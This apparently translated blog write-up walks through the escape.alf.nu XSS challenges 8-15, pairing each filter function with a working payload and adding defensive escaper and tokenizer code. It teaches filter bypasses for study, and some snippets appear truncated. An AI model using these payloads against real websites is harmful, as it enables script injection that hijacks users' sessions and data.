Escape.alf.nu XSS challenges 8-15 Advanced XSS



This article link: http://blog.csdn.net/u012763794/article/details/51526725


Last time I covered challenges 0-7 (http://blog.csdn.net/u012763794/article/details/51507593), in more detail than most write-ups. In fact, these levels need some hands-on XSS practice (set up your own unfiltered test page) and a working familiarity with JS.

Without further ado, straight to the challenges. Note: you pass a level by getting alert(1) to run.


Challenge 8
function escape(s) {
  // courtesy of Skandiabanken
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
This converts our input to uppercase.

Let's try HTML entity characters, that is, &# followed by the decimal ASCII code; hex works as well, e.g. &#x61, by adding an x after the #. Only the English letters get uppercased, so alert becomes &#97&#108&#101&#114&#116. Because these are HTML entities they only take effect inside an HTML element, so we put them in an img tag and see what happens.

In addition, HTML is not case-sensitive: an uppercase letter and its lowercase form mean the same thing.

It is a little long; just short of the mark.

Payload:</script><script >


There are other payloads and variants.

</script>

</script><svg onload=&#97&#108&#101&#114&#116(1)//

Hex:

</script><svg onload=&#x61&#x6C&#x65&#x72&#x74(1)//


Of course, you can also host a JS file on your own server whose content is just alert(1);


If you have a short domain name the payload gets shorter; a URL shortener probably will not be short enough.


Challenge 9
function escape(s) {
  // This is sort of a spoiler for the last level :-)
  if (/[\\<>]/.test(s)) return '-';
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
Here, as soon as the test matches a \, < or > it returns '-' directly, and the input is still uppercased, so we cannot enter < at all. Can the uppercased text still be turned into alert? Anyone who plays CTFs will have seen JSFuck often; encoding site: http://www.jsfuck.com/
That is a lot of characters.
I saw another letter-free JS encoding on FreeBuf before; I'll remember to write that up another time.
Challenge 10
function escape(s) {
  function htmlEscape(s) {
    return s.replace(/./g, function(x) {
      return { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' }[x] || x;
    });
  }

  function expandTemplate(template, args) {
    return template.replace(/{(\w+)}/g, function(_, n) {
      return htmlEscape(args[n]);
    });
  }

  return expandTemplate("\

First look at the final return: it calls expandTemplate to process a string of HTML elements, and expandTemplate in turn calls htmlEscape.

The expandTemplate function seems useless to me; if some expert knows why it is there, please tell me.


htmlEscape converts single and double quotes, &, < and > into HTML entities, but does not filter the \ escape character, so let's try hex escapes.


Payload: \x3cimg src=123 onerror=alert(1)// (\x3c is the less-than sign in hex)


You can see that JS turns the hex escape back into the character when it processes the string.


Other payloads (\x3e is the greater-than sign in hex):

\x3cimg src=123 onerror=alert(1)\x3e

\x3csvg onload=alert(1)// (svg is HTML5's canvas element)
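To make the two decoding steps behind challenges 8 and 10 concrete, here is an added example (my own code, not from the original post or from the escape.alf.nu challenges). It decodes numeric character references the way an attribute value is decoded (the challenge 8 payload), decodes JS string escape sequences the way a script engine reads a string literal (the challenge 10 payload), and puts challenge 10's HTML-only escaper next to an escaper written for the JS-string context. The function names are mine, and the line var data = '...' is my stand-in for the challenge's template, which is cut off above.

```javascript
// Added example, not from the original post. Function names are my own.

// Decode numeric character references as an HTML attribute value would
// (simplified: decimal and hex forms only; the semicolon is optional).
function decodeCharRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, function (_, num) {
    var code = num[0].toLowerCase() === 'x'
      ? parseInt(num.slice(1), 16)
      : parseInt(num, 10);
    return String.fromCharCode(code);
  });
}

// Decode the escapes a JS string literal understands (simplified: \xHH,
// \uHHHH and single-character escapes such as \n, \' and \\).
function decodeJsString(s) {
  var simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v', '0': '\0' };
  return s.replace(/\\(x[0-9a-f]{2}|u[0-9a-f]{4}|[\s\S])/gi, function (_, esc) {
    var kind = esc[0].toLowerCase();
    if (esc.length > 1 && (kind === 'x' || kind === 'u')) {
      return String.fromCharCode(parseInt(esc.slice(1), 16));
    }
    return Object.prototype.hasOwnProperty.call(simple, esc) ? simple[esc] : esc;
  });
}

// Challenge 10's escaper: entities for the five HTML specials, backslash untouched.
function htmlEscape(s) {
  return s.replace(/[<>&"']/g, function (c) {
    return { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// An escaper for the JS single-quoted-string context: \u-escape the quotes,
// the backslash, the HTML-significant characters and the line terminators, so
// neither the HTML parser nor the string decoder sees anything special.
function jsStringEscape(s) {
  return s.replace(/[\\'"<>&\r\n\u2028\u2029]/g, function (c) {
    return '\\u' + ('000' + c.charCodeAt(0).toString(16)).slice(-4);
  });
}

// Stand-in for the challenge template line, rendered with a given escaper.
function renderData(s, escaper) {
  return "var data = '" + escaper(s) + "';";
}

// The value the script engine ends up holding in `data`: the literal body
// between the quotes, decoded as a JS string.
function valueSeenByJs(s, escaper) {
  var body = renderData(s, escaper).slice("var data = '".length, -2);
  return decodeJsString(body);
}

// Constructed samples, shaped like the payloads discussed above.
var CH8_ATTR = 'onload=&#97&#108&#101&#114&#116(1)';
var CH10_DATA = '\\x3cimg src=123 onerror=alert(1)//';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeCharRefs(CH8_ATTR));                 // onload=alert(1)
  console.log(valueSeenByJs(CH10_DATA, htmlEscape));     // <img src=123 onerror=alert(1)//
  console.log(valueSeenByJs(CH10_DATA, jsStringEscape)); // \x3cimg src=123 onerror=alert(1)//
}
```

The point of the comparison: htmlEscape leaves CH10_DATA untouched, so the string the engine holds begins with a literal <img ...>, which is a problem as soon as the page uses that string as HTML (my assumption about what the challenge template does with it); jsStringEscape hands the engine exactly the text the user typed, backslash included, and nothing the HTML tokenizer reacts to.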


Challenge 11
function escape(s) {
  // Spoiler for level 2
  s = JSON.stringify(s).replace(/<\/script/gi, '');
  return '<script>console.log(' + s + ');</script>';
}
JSON.stringify escapes the double quote; the replace that follows replaces </script with the empty string, where g is global mode (search from start to end, however many matches there are) and i ignores case.
As with SQL injection filters that replace a keyword with nothing, we simply double-write it.
Payload: </sc</scriptript><script>alert(1)//
Of course with double-writing you can split it anywhere:
</</scriptscript><script>alert(1)//
</s</scriptcript><script>alert(1)//
... and so on.



Challenge 12

function escape(s) {
  // Pass inn "callback#userdata"
  var thing = s.split(/#/);

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1]};
  var json = JSON.stringify(obj).replace(/\//g, '\\/');
  return "<script>" + thing[0] + "(" + json + ")</script>";
}

var thing = s.split(/#/);

Splits the input into two parts on #.

if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';

To the left of the # only upper- and lower-case letters, square brackets and the single quote may appear.

var json = JSON.stringify(obj).replace(/\//g, '\\/');

This escapes: replace turns / into \\/, which in the resulting string is actually \/.


It turns out HTML comments work here too, which makes it simple.

Close the single quote in front, then comment out everything after.

Payload: '#'; alert(1);<!--
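Challenge 12's callback check next to a stricter one, as an added example (my own code, not from the original post or the challenge). The weak pattern is the one from the challenge; the strict pattern, the function names and the sample data are mine.

```javascript
// Added example, not from the original post. Names are my own.

// Challenge 12's filter: any mix of letters, square brackets and single quotes,
// including the empty string.
var WEAK_CALLBACK = /^[a-zA-Z\[\]']*$/;

// Stricter: a non-empty dotted identifier path such as "cb" or
// "app.handlers.onData". No quotes, brackets, leading digits or empty names.
var STRICT_CALLBACK = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return STRICT_CALLBACK.test(name);
}

// Serialize a value for a script context: JSON, then \u-escape the characters
// the HTML parser cares about (< > &) and the two line terminators that
// JSON.stringify leaves raw (U+2028, U+2029). Escaping "<" also covers the
// "</script" case that the challenge handles by escaping "/".
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, function (c) {
    return '\\u' + ('000' + c.charCodeAt(0).toString(16)).slice(-4);
  });
}

// Build the JSONP body for callback#userdata, or null if the callback is rejected.
function jsonp(callback, userdata) {
  if (!isValidCallback(callback)) return null;
  return callback + '(' + jsonForScript({ userdata: userdata }) + ');';
}

// Constructed sample: the shape of the challenge 12 payload, split on "#".
var SAMPLE = "'#'; alert(1);<!--".split('#');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(WEAK_CALLBACK.test(SAMPLE[0]));   // true: the quote passes the weak check
  console.log(jsonp(SAMPLE[0], SAMPLE[1]));     // null: rejected by the strict check
  console.log(jsonp('cb', SAMPLE[1]));          // cb({"userdata":"'; alert(1);\u003c!--"});
}
```

With the strict pattern the quote-only callback from the payload above is rejected outright, and with \u003c in the body the <!-- never reaches the HTML parser even when a legitimate callback name is used.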



Challenge 13

function escape(s) {
  var tag = document.createElement('iframe');

  // For this one, you get to run any code you want, but in a "sandboxed" iframe.
  // http://print.alf.nu/?html= just outputs whatever you pass in.
  // Alerting from print.alf.nu won't count, try to trigger the one below.

  s = '<script>' + s + '<\/script>';
  tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s);

  window.WINNING = function() { youWon = true; };

  tag.onload = function() {
    if (youWon) alert(1);
  };

  document.body.appendChild(tag);
}
encodeURIComponent() is just URL encoding.

Look at the iframe: when a name is set on an iframe, that name becomes a global on the Window object.

Like the abc example below.

Put more plainly:

There is one more detail: the URL goes straight back into JS and sets the iframe's name property.

So the payload is: name='youWon'



Challenge 14

function escape(s) {
  function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }
  function html(s) { return s.replace(/[<>"&]/g, function(s) {
                        return '&#' + s.charCodeAt(0) + ';'; }); }

  return (
    '<script>' +
      'var url = ' + json(s) + '; // We\'ll use this later ' +
    '</script>\n\n' +
    '  <!-- for debugging -->\n' +
    '  URL: ' + html(s) + '\n\n' +
    '<!-- then suddenly -->\n' +
    '<script>\n' +
    '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +
    '  else new Image().src = url;\n' +
    '</script>'
  );
}

First look at the return: it emits two scripts. The first <script> uses the json(s) function to build a url, and in between, html() prints the url.

The second script creates a new Image from our url if the check is bypassed.

The json function filters double quotes and the comment character /.

The html function filters < > " &.

First let's see the effect.

Because this one is more complicated, I'll explain it directly with someone else's payload.

alert(1);/*<!--<script>*/if(/a//*


Copy the right-hand side into our local test page.

We can see that the */* we entered comments out a lot of what follows; removing the (green) commented-out code, the simplified code is:

var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*";
URL: alert(1); if (/a/.test(url)) console.log("Bad url: " + url); else new Image().src = url;
That is much simpler.





Challenge 15

function escape(s) {
  return s.split('#').map(function(v) {
      // Only 20% of slashes are end tags; save 1.2% of total
      // bytes by only escaping those.
      var json = JSON.stringify(v).replace(/<\//g, '<\\/');
      return '<script>console.log(' + json + ')</script>';
  }).join('');
}

Payload: <!--<script>#)/;alert(1)//-->


Generated code: <script>console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")</script> Copy it locally.

Type the middle part straight into the console:

console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")

Simplified: console.log("<!--<script>")</script><script>console.log(")/; alert(1)

That is: console.log(...) less-than sign /regular expression/; alert(1)

So it is syntactically correct.

It is actually two statements.
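The reason challenges 11, 14 and 15 behave the way they do is the HTML tokenizer's script-data states: once a script contains <!-- followed by <script, a </script> no longer ends the element. Here is an added example (my own code, not from the original post or the challenges) with a small model of those states, used to show where a browser really ends the first script element for challenge 15's output under two serializers, and why challenge 11's single-pass strip is defeated by double-writing. The function names and the constructed strings are mine; the state machine is a simplification of the spec that models only the transitions for <!--, <script, </script and -->.

```javascript
// Added example, not from the original post. Names are my own; the state
// machine is a simplified model of the HTML tokenizer's script-data states.

// Index of the "</script" that really closes a script element whose content
// starts at `start`, or -1. "<!--" enters the escaped state; "<script" inside
// it enters the double-escaped state, where "</script" only drops back to
// escaped instead of ending the element; "-->" leaves both states.
function scriptDataEnd(html, start) {
  var lower = html.toLowerCase();
  var state = 'data';
  var i = start;
  // "<script" / "</script" count only when followed by whitespace, "/" or ">".
  function tagAt(name) {
    if (lower.substr(i, name.length) !== name) return false;
    var next = lower.charAt(i + name.length);
    return next === '' || /[\s\/>]/.test(next);
  }
  while (i < lower.length) {
    if (state === 'data') {
      if (tagAt('</script')) return i;
      if (lower.startsWith('<!--', i)) { state = 'escaped'; i += 4; continue; }
    } else if (state === 'escaped') {
      if (lower.startsWith('-->', i)) { state = 'data'; i += 3; continue; }
      if (tagAt('</script')) return i;
      if (tagAt('<script')) { state = 'double'; i += 7; continue; }
    } else {
      if (lower.startsWith('-->', i)) { state = 'data'; i += 3; continue; }
      if (tagAt('</script')) { state = 'escaped'; i += 8; continue; }
    }
    i++;
  }
  return -1;
}

// Challenge 11's filter: remove "</script" in a single pass.
function stripScriptClose(s) {
  return s.replace(/<\/script/gi, '');
}

// Challenge 15's serializer: JSON, then "</" becomes "<\/".
function escapeEndTags(v) {
  return JSON.stringify(v).replace(/<\//g, '<\\/');
}

// Alternative serializer: JSON, then every "<" becomes \u003c, so the
// tokenizer never sees a "<" inside the string at all.
function escapeLt(v) {
  return JSON.stringify(v).replace(/</g, '\\u003c');
}

// The challenge 15 page shape for a "#"-separated input and a serializer.
function render(input, serializer) {
  return input.split('#').map(function (v) {
    return '<script>console.log(' + serializer(v) + ')</script>';
  }).join('');
}

// What the first <script> element of `html` contains once tokenized.
function firstScriptBody(html) {
  var start = html.indexOf('<script>') + '<script>'.length;
  var end = scriptDataEnd(html, start);
  return end < 0 ? null : html.slice(start, end);
}

// Constructed sample: the challenge 15 payload discussed above.
var P15 = '<!--<script>#)/;alert(1)//-->';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(firstScriptBody(render(P15, escapeEndTags))); // spans both <script> elements
  console.log(firstScriptBody(render(P15, escapeLt)));      // ends at the first </script>
  console.log(stripScriptClose('</sc</scriptript'));        // </script
}
```

With escapeEndTags the first script body runs through the inner </script><script> and only ends at the last </script>, which is exactly the two-statement program the console output above shows; with escapeLt the tokenizer closes the element at the first </script> because no <!-- or <script survives inside the string.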


All right, that is it; discussion is welcome.
